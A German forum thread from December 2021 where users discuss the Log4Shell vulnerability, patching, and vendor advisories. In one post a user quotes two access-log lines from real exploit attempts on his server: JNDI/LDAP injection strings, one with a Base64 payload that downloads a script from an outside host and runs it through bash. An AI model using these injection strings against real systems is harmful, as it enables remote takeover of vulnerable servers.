Log4Shell - und ihr so?

Ledeker · 20. Dezember 2021

Hintergrund: https://www.heise.de/news/Kritische...hrdet-zahlreiche-Server-und-Apps-6291653.html

Ratgeber: https://www.heise.de/ratgeber/Schut...ke-was-jetzt-hilft-und-was-nicht-6292961.html

Aktuelle News: https://www.borncity.com/blog/2021/...anzhof-webseite-down-viele-firmen-ungepatcht/

Ich installiere einfach nur regelmäßig Sicherheitsupdates und muss darauf vertrauen, dass der Software-Hersteller das Problem angeht.

Anzeige

Schau mal hier:
Log4Shell - und ihr so? .

patrick78 · 20. Dezember 2021

Kommt ja drauf an was du am laufen hast...

MTB-News.de

reo-fahrer · 21. Dezember 2021

Ledeker schrieb:
Hintergrund: https://www.heise.de/news/Kritische...hrdet-zahlreiche-Server-und-Apps-6291653.html

Ratgeber: https://www.heise.de/ratgeber/Schut...ke-was-jetzt-hilft-und-was-nicht-6292961.html

Aktuelle News: https://www.borncity.com/blog/2021/...anzhof-webseite-down-viele-firmen-ungepatcht/

Ich installiere einfach nur regelmäßig Sicherheitsupdates und muss darauf vertrauen, dass der Software-Hersteller das Problem angeht.

10 Tage zu spät dran

Für den klassischen Heimanwender ist das eher irrelevant, Java Anwendungen unter Windows + extern kontrollierbarer Input ist da ja nicht so gängig. Interessant wird's halt für alles was du irgendwie an Server-Diensten ins Internet anbietest. Minecraft Server z.B. https://winfuture.de/news,127072.html

mad raven · 21. Dezember 2021

naja die augen aufhalten nach sicherheits updates sollte jeder - jetzt besonders. und bei einem system ohne paketverwaltung ist das etwas nerviger.
Das üblie ist, dass man i.E. wenig machen kann ausser warten und hoffen.

Ledeker · 21. Dezember 2021

reo-fahrer schrieb:
10 Tage zu spät dran

Für Admins (hier) und welche die sich auch nur so nennen, ggf. ganz hilfreich. :cool:

reo-fahrer · 21. Dezember 2021

Ledeker schrieb:
Für Admins (hier) und welche die sich auch nur so nennen, ggf. ganz hilfreich.

Wenn du das wirklich ernsthaft machen willst ist das 10 Tage zu spät. Kollegen hatten letzten Freitag/Samstag angefangen mit den möglichen Mitigations + Hersteller-Support zu klären bzw. entsprechende Patches einzuspielen, selbst Oracle hatte noch am Wochenende
"Impact of December 2021 Apache Log4j Vulnerabilities on Oracle Products and Services (CVE-2021-44228, CVE-2021-45046) (Doc ID 2827611.1)" veröffentlich, die Liste für alle halbwegs relevanten Produkte war Mitte letzter Woche schon ziemlich geklärt (not affected bzw. eine weitere Support-Note mit Patch o.ä.).
Ich hab ja privat bisschen Hardware mit Webserver etc. laufen und im accesslog waren diese beiden Einträge die ersten Versuche vom exploit:

147.x.y.z - - [10/Dec/2021:16:32:42 +0100] "GET / HTTP/1.1" 301 247 "-" "${j.n.d.i:l.d.a.p://134.a.b.c/callback/}"
45.a.b.c - - [10/Dec/2021:19:11:42 +0100] "GET / HTTP/1.1" 301 247 "-" "${j.n.d.i:l.d.a.p://45.x.y.z:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMTMuOTUuMjEuNjA6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMjEzLjk1LjIxLjYwOjgwKXxiYXNo}"

sprich vollkommen random "da läuft ein Webserver, probieren wir aus ob das funktioniert", wenn ich irgendwo ein log4j in den Untiefen meines Apache hätte wäre die Kiste vermutlich jetzt gerootet.

und tante Edit sagt, auch das Forum hat wohl schon ihren Parser aufgebohrt, der alle jndi::ldap Dinge filtert...

Log4Shell - und ihr so?

Ledeker

Anzeige

patrick78

MTB-News.de

reo-fahrer

cooler Junge.

mad raven

Ledeker

reo-fahrer

cooler Junge.

Ähnliche Themen